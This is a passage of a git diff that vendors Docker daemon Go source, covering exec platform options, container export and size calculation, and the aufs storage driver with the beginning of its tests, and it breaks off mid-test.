+++ b/vendor/github.com/docker/docker/daemon/exec_linux.go
@@ -0,0 +1,27 @@
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/caps"
+	"github.com/docker/docker/daemon/exec"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error {
+	if len(ec.User) > 0 {
+		uid, gid, additionalGids, err := getUser(c, ec.User)
+		if err != nil {
+			return err
+		}
+		p.User = &specs.User{
+			UID:            uid,
+			GID:            gid,
+			AdditionalGids: additionalGids,
+		}
+	}
+	if ec.Privileged {
+		p.Capabilities = caps.GetAllCapabilities()
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/exec_solaris.go b/vendor/github.com/docker/docker/daemon/exec_solaris.go
new file mode 100644
index 0000000000..7003355d91
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/exec_solaris.go
@@ -0,0 +1,11 @@
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+	"github.com/docker/docker/libcontainerd"
+)
+
+func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/exec_windows.go b/vendor/github.com/docker/docker/daemon/exec_windows.go
new file mode 100644
index 0000000000..1d6974cda9
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/exec_windows.go
@@ -0,0 +1,14 @@
+package daemon
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+	"github.com/docker/docker/libcontainerd"
+)
+
+func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error {
+	// Process arguments need to be escaped before sending to OCI.
+	p.Args = escapeArgs(p.Args)
+	p.User.Username = ec.User
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/export.go b/vendor/github.com/docker/docker/daemon/export.go
new file mode 100644
index 0000000000..5ef6dbb0e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/export.go
@@ -0,0 +1,60 @@
+package daemon
+
+import (
+	"fmt"
+	"io"
+	"runtime"
+
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+// ContainerExport writes the contents of the container to the given
+// writer. An error is returned if the container cannot be found.
+func (daemon *Daemon) ContainerExport(name string, out io.Writer) error {
+	if runtime.GOOS == "windows" {
+		return fmt.Errorf("the daemon on this platform does not support export of a container")
+	}
+
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	data, err := daemon.containerExport(container)
+	if err != nil {
+		return fmt.Errorf("Error exporting container %s: %v", name, err)
+	}
+	defer data.Close()
+
+	// Stream the entire contents of the container (basically a volatile snapshot)
+	if _, err := io.Copy(out, data); err != nil {
+		return fmt.Errorf("Error exporting container %s: %v", name, err)
+	}
+	return nil
+}
+
+func (daemon *Daemon) containerExport(container *container.Container) (io.ReadCloser, error) {
+	if err := daemon.Mount(container); err != nil {
+		return nil, err
+	}
+
+	uidMaps, gidMaps := daemon.GetUIDGIDMaps()
+	archive, err := archive.TarWithOptions(container.BaseFS, &archive.TarOptions{
+		Compression: archive.Uncompressed,
+		UIDMaps:     uidMaps,
+		GIDMaps:     gidMaps,
+	})
+	if err != nil {
+		daemon.Unmount(container)
+		return nil, err
+	}
+	arch := ioutils.NewReadCloserWrapper(archive, func() error {
+		err := archive.Close()
+		daemon.Unmount(container)
+		return err
+	})
+	daemon.LogContainerEvent(container, "export")
+	return arch, err
+}
diff --git a/vendor/github.com/docker/docker/daemon/getsize_unix.go b/vendor/github.com/docker/docker/daemon/getsize_unix.go
new file mode 100644
index 0000000000..707323a4bf
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/getsize_unix.go
@@ -0,0 +1,41 @@
+// +build linux freebsd solaris
+
+package daemon
+
+import (
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/container"
+)
+
+// getSize returns the real size & virtual size of the container.
+func (daemon *Daemon) getSize(container *container.Container) (int64, int64) {
+	var (
+		sizeRw, sizeRootfs int64
+		err                error
+	)
+
+	if err := daemon.Mount(container); err != nil {
+		logrus.Errorf("Failed to compute size of container rootfs %s: %s", container.ID, err)
+		return sizeRw, sizeRootfs
+	}
+	defer daemon.Unmount(container)
+
+	sizeRw, err = container.RWLayer.Size()
+	if err != nil {
+		logrus.Errorf("Driver %s couldn't return diff size of container %s: %s",
+			daemon.GraphDriverName(), container.ID, err)
+		// FIXME: GetSize should return an error. Not changing it now in case
+		// there is a side-effect.
+		sizeRw = -1
+	}
+
+	if parent := container.RWLayer.Parent(); parent != nil {
+		sizeRootfs, err = parent.Size()
+		if err != nil {
+			sizeRootfs = -1
+		} else if sizeRw != -1 {
+			sizeRootfs += sizeRw
+		}
+	}
+	return sizeRw, sizeRootfs
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go
new file mode 100644
index 0000000000..ec55ea4cde
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go
@@ -0,0 +1,669 @@
+// +build linux
+
+/*
+
+aufs driver directory structure
+
+  .
+  ├── layers // Metadata of layers
+  │   ├── 1
+  │   ├── 2
+  │   └── 3
+  ├── diff  // Content of the layer
+  │   ├── 1  // Contains layers that need to be mounted for the id
+  │   ├── 2
+  │   └── 3
+  └── mnt    // Mount points for the rw layers to be mounted
+      ├── 1
+      ├── 2
+      └── 3
+
+*/
+
+package aufs
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/vbatts/tar-split/tar/storage"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/directory"
+	"github.com/docker/docker/pkg/idtools"
+	mountpk "github.com/docker/docker/pkg/mount"
+
+	"github.com/opencontainers/runc/libcontainer/label"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+)
+
+var (
+	// ErrAufsNotSupported is returned if aufs is not supported by the host.
+	ErrAufsNotSupported = fmt.Errorf("AUFS was not found in /proc/filesystems")
+	// ErrAufsNested means aufs cannot be used bc we are in a user namespace
+	ErrAufsNested = fmt.Errorf("AUFS cannot be used in non-init user namespace")
+	backingFs     = "<unknown>"
+
+	enableDirpermLock sync.Once
+	enableDirperm     bool
+)
+
+func init() {
+	graphdriver.Register("aufs", Init)
+}
+
+// Driver contains information about the filesystem mounted.
+type Driver struct {
+	sync.Mutex
+	root          string
+	uidMaps       []idtools.IDMap
+	gidMaps       []idtools.IDMap
+	ctr           *graphdriver.RefCounter
+	pathCacheLock sync.Mutex
+	pathCache     map[string]string
+	naiveDiff     graphdriver.DiffDriver
+}
+
+// Init returns a new AUFS driver.
+// An error is returned if AUFS is not supported.
+func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+
+	// Try to load the aufs kernel module
+	if err := supportsAufs(); err != nil {
+		return nil, graphdriver.ErrNotSupported
+	}
+
+	fsMagic, err := graphdriver.GetFSMagic(root)
+	if err != nil {
+		return nil, err
+	}
+	if fsName, ok := graphdriver.FsNames[fsMagic]; ok {
+		backingFs = fsName
+	}
+
+	switch fsMagic {
+	case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs:
+		logrus.Errorf("AUFS is not supported over %s", backingFs)
+		return nil, graphdriver.ErrIncompatibleFS
+	}
+
+	paths := []string{
+		"mnt",
+		"diff",
+		"layers",
+	}
+
+	a := &Driver{
+		root:      root,
+		uidMaps:   uidMaps,
+		gidMaps:   gidMaps,
+		pathCache: make(map[string]string),
+		ctr:       graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicAufs)),
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	// Create the root aufs driver dir and return
+	// if it already exists
+	// If not populate the dir structure
+	if err := idtools.MkdirAllAs(root, 0700, rootUID, rootGID); err != nil {
+		if os.IsExist(err) {
+			return a, nil
+		}
+		return nil, err
+	}
+
+	if err := mountpk.MakePrivate(root); err != nil {
+		return nil, err
+	}
+
+	// Populate the dir structure
+	for _, p := range paths {
+		if err := idtools.MkdirAllAs(path.Join(root, p), 0700, rootUID, rootGID); err != nil {
+			return nil, err
+		}
+	}
+
+	a.naiveDiff = graphdriver.NewNaiveDiffDriver(a, uidMaps, gidMaps)
+	return a, nil
+}
+
+// Return a nil error if the kernel supports aufs
+// We cannot modprobe because inside dind modprobe fails
+// to run
+func supportsAufs() error {
+	// We can try to modprobe aufs first before looking at
+	// proc/filesystems for when aufs is supported
+	exec.Command("modprobe", "aufs").Run()
+
+	if rsystem.RunningInUserNS() {
+		return ErrAufsNested
+	}
+
+	f, err := os.Open("/proc/filesystems")
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	s := bufio.NewScanner(f)
+	for s.Scan() {
+		if strings.Contains(s.Text(), "aufs") {
+			return nil
+		}
+	}
+	return ErrAufsNotSupported
+}
+
+func (a *Driver) rootPath() string {
+	return a.root
+}
+
+func (*Driver) String() string {
+	return "aufs"
+}
+
+// Status returns current information about the filesystem such as root directory, number of directories mounted, etc.
+func (a *Driver) Status() [][2]string {
+	ids, _ := loadIds(path.Join(a.rootPath(), "layers"))
+	return [][2]string{
+		{"Root Dir", a.rootPath()},
+		{"Backing Filesystem", backingFs},
+		{"Dirs", fmt.Sprintf("%d", len(ids))},
+		{"Dirperm1 Supported", fmt.Sprintf("%v", useDirperm())},
+	}
+}
+
+// GetMetadata not implemented
+func (a *Driver) GetMetadata(id string) (map[string]string, error) {
+	return nil, nil
+}
+
+// Exists returns true if the given id is registered with
+// this driver
+func (a *Driver) Exists(id string) bool {
+	if _, err := os.Lstat(path.Join(a.rootPath(), "layers", id)); err != nil {
+		return false
+	}
+	return true
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (a *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	return a.Create(id, parent, opts)
+}
+
+// Create three folders for each id
+// mnt, layers, and diff
+func (a *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+
+	if opts != nil && len(opts.StorageOpt) != 0 {
+		return fmt.Errorf("--storage-opt is not supported for aufs")
+	}
+
+	if err := a.createDirsFor(id); err != nil {
+		return err
+	}
+	// Write the layers metadata
+	f, err := os.Create(path.Join(a.rootPath(), "layers", id))
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	if parent != "" {
+		ids, err := getParentIDs(a.rootPath(), parent)
+		if err != nil {
+			return err
+		}
+
+		if _, err := fmt.Fprintln(f, parent); err != nil {
+			return err
+		}
+		for _, i := range ids {
+			if _, err := fmt.Fprintln(f, i); err != nil {
+				return err
+			}
+		}
+	}
+
+	return nil
+}
+
+// createDirsFor creates two directories for the given id.
+// mnt and diff
+func (a *Driver) createDirsFor(id string) error {
+	paths := []string{
+		"mnt",
+		"diff",
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(a.uidMaps, a.gidMaps)
+	if err != nil {
+		return err
+	}
+	// Directory permission is 0755.
+	// The path of directories are <aufs_root_path>/mnt/<image_id>
+	// and <aufs_root_path>/diff/<image_id>
+	for _, p := range paths {
+		if err := idtools.MkdirAllAs(path.Join(a.rootPath(), p, id), 0755, rootUID, rootGID); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// Helper function to debug EBUSY errors on remove.
+func debugEBusy(mountPath string) (out []string, err error) {
+	// lsof is not part of GNU coreutils. This is a best effort
+	// attempt to detect offending processes.
+	c := exec.Command("lsof")
+
+	r, err := c.StdoutPipe()
+	if err != nil {
+		return nil, fmt.Errorf("Assigning pipes failed with %v", err)
+	}
+
+	if err := c.Start(); err != nil {
+		return nil, fmt.Errorf("Starting %s failed with %v", c.Path, err)
+	}
+
+	defer func() {
+		waiterr := c.Wait()
+		if waiterr != nil && err == nil {
+			err = fmt.Errorf("Waiting for %s failed with %v", c.Path, waiterr)
+		}
+	}()
+
+	sc := bufio.NewScanner(r)
+	for sc.Scan() {
+		entry := sc.Text()
+		if strings.Contains(entry, mountPath) {
+			out = append(out, entry, "\n")
+		}
+	}
+
+	return out, nil
+}
+
+// Remove will unmount and remove the given id.
+func (a *Driver) Remove(id string) error {
+	a.pathCacheLock.Lock()
+	mountpoint, exists := a.pathCache[id]
+	a.pathCacheLock.Unlock()
+	if !exists {
+		mountpoint = a.getMountpoint(id)
+	}
+
+	var retries int
+	for {
+		mounted, err := a.mounted(mountpoint)
+		if err != nil {
+			return err
+		}
+		if !mounted {
+			break
+		}
+
+		if err := a.unmount(mountpoint); err != nil {
+			if err != syscall.EBUSY {
+				return fmt.Errorf("aufs: unmount error: %s: %v", mountpoint, err)
+			}
+			if retries >= 5 {
+				out, debugErr := debugEBusy(mountpoint)
+				if debugErr == nil {
+					logrus.Warnf("debugEBusy returned %v", out)
+				}
+				return fmt.Errorf("aufs: unmount error after retries: %s: %v", mountpoint, err)
+			}
+			// If unmount returns EBUSY, it could be a transient error. Sleep and retry.
+			retries++
+			logrus.Warnf("unmount failed due to EBUSY: retry count: %d", retries)
+			time.Sleep(100 * time.Millisecond)
+			continue
+		}
+		break
+	}
+
+	// Atomically remove each directory in turn by first moving it out of the
+	// way (so that docker doesn't find it anymore) before doing removal of
+	// the whole tree.
+	tmpMntPath := path.Join(a.mntPath(), fmt.Sprintf("%s-removing", id))
+	if err := os.Rename(mountpoint, tmpMntPath); err != nil && !os.IsNotExist(err) {
+		if err == syscall.EBUSY {
+			logrus.Warn("os.Rename err due to EBUSY")
+			out, debugErr := debugEBusy(mountpoint)
+			if debugErr == nil {
+				logrus.Warnf("debugEBusy returned %v", out)
+			}
+		}
+		return err
+	}
+	defer os.RemoveAll(tmpMntPath)
+
+	tmpDiffpath := path.Join(a.diffPath(), fmt.Sprintf("%s-removing", id))
+	if err := os.Rename(a.getDiffPath(id), tmpDiffpath); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+	defer os.RemoveAll(tmpDiffpath)
+
+	// Remove the layers file for the id
+	if err := os.Remove(path.Join(a.rootPath(), "layers", id)); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+
+	a.pathCacheLock.Lock()
+	delete(a.pathCache, id)
+	a.pathCacheLock.Unlock()
+	return nil
+}
+
+// Get returns the rootfs path for the id.
+// This will mount the dir at its given path
+func (a *Driver) Get(id, mountLabel string) (string, error) {
+	parents, err := a.getParentLayerPaths(id)
+	if err != nil && !os.IsNotExist(err) {
+		return "", err
+	}
+
+	a.pathCacheLock.Lock()
+	m, exists := a.pathCache[id]
+	a.pathCacheLock.Unlock()
+
+	if !exists {
+		m = a.getDiffPath(id)
+		if len(parents) > 0 {
+			m = a.getMountpoint(id)
+		}
+	}
+	if count := a.ctr.Increment(m); count > 1 {
+		return m, nil
+	}
+
+	// If a dir does not have a parent ( no layers )do not try to mount
+	// just return the diff path to the data
+	if len(parents) > 0 {
+		if err := a.mount(id, m, mountLabel, parents); err != nil {
+			return "", err
+		}
+	}
+
+	a.pathCacheLock.Lock()
+	a.pathCache[id] = m
+	a.pathCacheLock.Unlock()
+	return m, nil
+}
+
+// Put unmounts and updates list of active mounts.
+func (a *Driver) Put(id string) error {
+	a.pathCacheLock.Lock()
+	m, exists := a.pathCache[id]
+	if !exists {
+		m = a.getMountpoint(id)
+		a.pathCache[id] = m
+	}
+	a.pathCacheLock.Unlock()
+	if count := a.ctr.Decrement(m); count > 0 {
+		return nil
+	}
+
+	err := a.unmount(m)
+	if err != nil {
+		logrus.Debugf("Failed to unmount %s aufs: %v", id, err)
+	}
+	return err
+}
+
+// isParent returns if the passed in parent is the direct parent of the passed in layer
+func (a *Driver) isParent(id, parent string) bool {
+	parents, _ := getParentIDs(a.rootPath(), id)
+	if parent == "" && len(parents) > 0 {
+		return false
+	}
+	return !(len(parents) > 0 && parent != parents[0])
+}
+
+// Diff produces an archive of the changes between the specified
+// layer and its parent layer which may be "".
+func (a *Driver) Diff(id, parent string) (io.ReadCloser, error) {
+	if !a.isParent(id, parent) {
+		return a.naiveDiff.Diff(id, parent)
+	}
+
+	// AUFS doesn't need the parent layer to produce a diff.
+	return archive.TarWithOptions(path.Join(a.rootPath(), "diff", id), &archive.TarOptions{
+		Compression:     archive.Uncompressed,
+		ExcludePatterns: []string{archive.WhiteoutMetaPrefix + "*", "!" + archive.WhiteoutOpaqueDir},
+		UIDMaps:         a.uidMaps,
+		GIDMaps:         a.gidMaps,
+	})
+}
+
+type fileGetNilCloser struct {
+	storage.FileGetter
+}
+
+func (f fileGetNilCloser) Close() error {
+	return nil
+}
+
+// DiffGetter returns a FileGetCloser that can read files from the directory that
+// contains files for the layer differences. Used for direct access for tar-split.
+func (a *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) {
+	p := path.Join(a.rootPath(), "diff", id)
+	return fileGetNilCloser{storage.NewPathFileGetter(p)}, nil
+}
+
+func (a *Driver) applyDiff(id string, diff io.Reader) error {
+	return chrootarchive.UntarUncompressed(diff, path.Join(a.rootPath(), "diff", id), &archive.TarOptions{
+		UIDMaps: a.uidMaps,
+		GIDMaps: a.gidMaps,
+	})
+}
+
+// DiffSize calculates the changes between the specified id
+// and its parent and returns the size in bytes of the changes
+// relative to its base filesystem directory.
+func (a *Driver) DiffSize(id, parent string) (size int64, err error) {
+	if !a.isParent(id, parent) {
+		return a.naiveDiff.DiffSize(id, parent)
+	}
+	// AUFS doesn't need the parent layer to calculate the diff size.
+	return directory.Size(path.Join(a.rootPath(), "diff", id))
+}
+
+// ApplyDiff extracts the changeset from the given diff into the
+// layer with the specified id and parent, returning the size of the
+// new layer in bytes.
+func (a *Driver) ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) {
+	if !a.isParent(id, parent) {
+		return a.naiveDiff.ApplyDiff(id, parent, diff)
+	}
+
+	// AUFS doesn't need the parent id to apply the diff if it is the direct parent.
+	if err = a.applyDiff(id, diff); err != nil {
+		return
+	}
+
+	return a.DiffSize(id, parent)
+}
+
+// Changes produces a list of changes between the specified layer
+// and its parent layer. If parent is "", then all changes will be ADD changes.
+func (a *Driver) Changes(id, parent string) ([]archive.Change, error) {
+	if !a.isParent(id, parent) {
+		return a.naiveDiff.Changes(id, parent)
+	}
+
+	// AUFS doesn't have snapshots, so we need to get changes from all parent
+	// layers.
+	layers, err := a.getParentLayerPaths(id)
+	if err != nil {
+		return nil, err
+	}
+	return archive.Changes(layers, path.Join(a.rootPath(), "diff", id))
+}
+
+func (a *Driver) getParentLayerPaths(id string) ([]string, error) {
+	parentIds, err := getParentIDs(a.rootPath(), id)
+	if err != nil {
+		return nil, err
+	}
+	layers := make([]string, len(parentIds))
+
+	// Get the diff paths for all the parent ids
+	for i, p := range parentIds {
+		layers[i] = path.Join(a.rootPath(), "diff", p)
+	}
+	return layers, nil
+}
+
+func (a *Driver) mount(id string, target string, mountLabel string, layers []string) error {
+	a.Lock()
+	defer a.Unlock()
+
+	// If the id is mounted or we get an error return
+	if mounted, err := a.mounted(target); err != nil || mounted {
+		return err
+	}
+
+	rw := a.getDiffPath(id)
+
+	if err := a.aufsMount(layers, rw, target, mountLabel); err != nil {
+		return fmt.Errorf("error creating aufs mount to %s: %v", target, err)
+	}
+	return nil
+}
+
+func (a *Driver) unmount(mountPath string) error {
+	a.Lock()
+	defer a.Unlock()
+
+	if mounted, err := a.mounted(mountPath); err != nil || !mounted {
+		return err
+	}
+	if err := Unmount(mountPath); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (a *Driver) mounted(mountpoint string) (bool, error) {
+	return graphdriver.Mounted(graphdriver.FsMagicAufs, mountpoint)
+}
+
+// Cleanup aufs and unmount all mountpoints
+func (a *Driver) Cleanup() error {
+	var dirs []string
+	if err := filepath.Walk(a.mntPath(), func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+		if !info.IsDir() {
+			return nil
+		}
+		dirs = append(dirs, path)
+		return nil
+	}); err != nil {
+		return err
+	}
+
+	for _, m := range dirs {
+		if err := a.unmount(m); err != nil {
+			logrus.Debugf("aufs error unmounting %s: %s", m, err)
+		}
+	}
+	return mountpk.Unmount(a.root)
+}
+
+func (a *Driver) aufsMount(ro []string, rw, target, mountLabel string) (err error) {
+	defer func() {
+		if err != nil {
+			Unmount(target)
+		}
+	}()
+
+	// Mount options are clipped to page size(4096 bytes). If there are more
+	// layers then these are remounted individually using append.
+
+	offset := 54
+	if useDirperm() {
+		offset += len("dirperm1")
+	}
+	b := make([]byte, syscall.Getpagesize()-len(mountLabel)-offset) // room for xino & mountLabel
+	bp := copy(b, fmt.Sprintf("br:%s=rw", rw))
+
+	index := 0
+	for ; index < len(ro); index++ {
+		layer := fmt.Sprintf(":%s=ro+wh", ro[index])
+		if bp+len(layer) > len(b) {
+			break
+		}
+		bp += copy(b[bp:], layer)
+	}
+
+	opts := "dio,xino=/dev/shm/aufs.xino"
+	if useDirperm() {
+		opts += ",dirperm1"
+	}
+	data := label.FormatMountLabel(fmt.Sprintf("%s,%s", string(b[:bp]), opts), mountLabel)
+	if err = mount("none", target, "aufs", 0, data); err != nil {
+		return
+	}
+
+	for ; index < len(ro); index++ {
+		layer := fmt.Sprintf(":%s=ro+wh", ro[index])
+		data := label.FormatMountLabel(fmt.Sprintf("append%s", layer), mountLabel)
+		if err = mount("none", target, "aufs", syscall.MS_REMOUNT, data); err != nil {
+			return
+		}
+	}
+
+	return
+}
+
+// useDirperm checks dirperm1 mount option can be used with the current
+// version of aufs.
+func useDirperm() bool {
+	enableDirpermLock.Do(func() {
+		base, err := ioutil.TempDir("", "docker-aufs-base")
+		if err != nil {
+			logrus.Errorf("error checking dirperm1: %v", err)
+			return
+		}
+		defer os.RemoveAll(base)
+
+		union, err := ioutil.TempDir("", "docker-aufs-union")
+		if err != nil {
+			logrus.Errorf("error checking dirperm1: %v", err)
+			return
+		}
+		defer os.RemoveAll(union)
+
+		opts := fmt.Sprintf("br:%s,dirperm1,xino=/dev/shm/aufs.xino", base)
+		if err := mount("none", union, "aufs", 0, opts); err != nil {
+			return
+		}
+		enableDirperm = true
+		if err := Unmount(union); err != nil {
+			logrus.Errorf("error checking dirperm1: failed to unmount %v", err)
+		}
+	})
+	return enableDirperm
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go
new file mode 100644
index 0000000000..dc3c6a392b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go
@@ -0,0 +1,802 @@
+// +build linux
+
+package aufs
+
+import (
+	"crypto/sha256"
+	"encoding/hex"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"sync"
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+var (
+	tmpOuter = path.Join(os.TempDir(), "aufs-tests")
+	tmp      = path.Join(tmpOuter, "aufs")
+)
+
+func init() {
+	reexec.Init()
+}
+
+func testInit(dir string, t testing.TB) graphdriver.Driver {
+	d, err := Init(dir, nil, nil, nil)
+	if err != nil {
+		if err == graphdriver.ErrNotSupported {
+			t.Skip(err)
+		} else {
+			t.Fatal(err)
+		}
+	}
+	return d
+}
+
+func newDriver(t testing.TB) *Driver {
+	if err := os.MkdirAll(tmp, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	d := testInit(tmp, t)
+	return d.(*Driver)
+}
+
+func TestNewDriver(t *testing.T) {
+	if err := os.MkdirAll(tmp, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	d := testInit(tmp, t)
+	defer os.RemoveAll(tmp)
+	if d == nil {
+		t.Fatalf("Driver should not be nil")
+	}
+}
+
+func TestAufsString(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if d.String() != "aufs" {
+		t.Fatalf("Expected aufs got %s", d.String())
+	}
+}
+
+func TestCreateDirStructure(t *testing.T) {
+	newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	paths := []string{
+		"mnt",
+		"layers",
+		"diff",
+	}
+
+	for _, p := range paths {
+		if _, err := os.Stat(path.Join(tmp, p)); err != nil {
+			t.Fatal(err)
+		}
+	}
+}
+
+// We should be able to create two drivers with the same dir structure
+func TestNewDriverFromExistingDir(t *testing.T) {
+	if err := os.MkdirAll(tmp, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	testInit(tmp, t)
+	testInit(tmp, t)
+	os.RemoveAll(tmp)
+}
+
+func TestCreateNewDir(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestCreateNewDirStructure(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	paths := []string{
+		"mnt",
+		"diff",
+		"layers",
+	}
+
+	for _, p := range paths {
+		if _, err := os.Stat(path.Join(tmp, p, "1")); err != nil {
+			t.Fatal(err)
+		}
+	}
+}
+
+func TestRemoveImage(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := d.Remove("1"); err != nil {
+		t.Fatal(err)
+	}
+
+	paths := []string{
+		"mnt",
+		"diff",
+		"layers",
+	}
+
+	for _, p := range paths {
+		if _, err := os.Stat(path.Join(tmp, p, "1")); err == nil {
+			t.Fatalf("Error should not be nil because dirs with id 1 should be delted: %s", p)
+		}
+	}
+}
+
+func TestGetWithoutParent(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	diffPath, err := d.Get("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	expected := path.Join(tmp, "diff", "1")
+	if diffPath != expected {
+		t.Fatalf("Expected path %s got %s", expected, diffPath)
+	}
+}
+
+func TestCleanupWithNoDirs(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Cleanup(); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestCleanupWithDir(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := d.Cleanup(); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestMountedFalseResponse(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	response, err := d.mounted(d.getDiffPath("1"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if response != false {
+		t.Fatalf("Response if dir id 1 is mounted should be false")
+	}
+}
+
+func TestMountedTrueReponse(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+	defer d.Cleanup()
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+	if err := d.Create("2", "1", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	_, err := d.Get("2", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	response, err := d.mounted(d.pathCache["2"])
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if response != true {
+		t.Fatalf("Response if dir id 2 is mounted should be true")
+	}
+}
+
+func TestMountWithParent(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+	if err := d.Create("2", "1", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	defer func() {
+		if err := d.Cleanup(); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	mntPath, err := d.Get("2", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if mntPath == "" {
+		t.Fatal("mntPath should not be empty string")
+	}
+
+	expected := path.Join(tmp, "mnt", "2")
+	if mntPath != expected {
+		t.Fatalf("Expected %s got %s", expected, mntPath)
+	}
+}
+
+func TestRemoveMountedDir(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+	if err := d.Create("2", "1", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	defer func() {
+		if err := d.Cleanup(); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	mntPath, err := d.Get("2", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if mntPath == "" {
+		t.Fatal("mntPath should not be empty string")
+	}
+
+	mounted, err := d.mounted(d.pathCache["2"])
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !mounted {
+		t.Fatalf("Dir id 2 should be mounted")
+	}
+
+	if err := d.Remove("2"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestCreateWithInvalidParent(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "docker", nil); err == nil {
